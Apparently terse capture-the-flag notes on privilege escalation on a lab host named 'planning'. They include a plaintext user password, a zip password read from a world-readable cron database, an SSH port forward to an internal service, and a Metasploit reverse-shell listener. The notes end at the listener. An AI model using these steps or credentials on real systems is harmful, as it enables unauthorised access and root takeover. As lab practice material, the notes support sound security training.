Priv Esc

enzo:RioTecRANDEntANT!

enzo@planning:~$ ls -l /opt
total 8
drwx--x--x 4 root root 4096 Feb 28 19:06 containerd
drwxr-xr-x 2 root root 4096 Jun  5 09:52 crontabs
enzo@planning:~$ ls -la /opt/containerd/
ls: cannot open directory '/opt/containerd/': Permission denied
enzo@planning:~$ ls -la /opt/crontabs/
total 12
drwxr-xr-x 2 root root 4096 Jun  5 09:52 .
drwxr-xr-x 4 root root 4096 Feb 28 19:21 ..
-rw-r--r-- 1 root root  737 Jun  7 04:00 crontab.db
enzo@planning:~$ cat /opt/crontabs/crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}

❯ ssh enzo@10.10.11.68 -o EnableEscapeCommandline=yes

enzo@planning:~$
ssh> -L 9999:127.0.0.1:8000
Forwarding port.

❯ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 443; run'
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 443
[*] Started reverse TCP handler on 10.10.14.3:443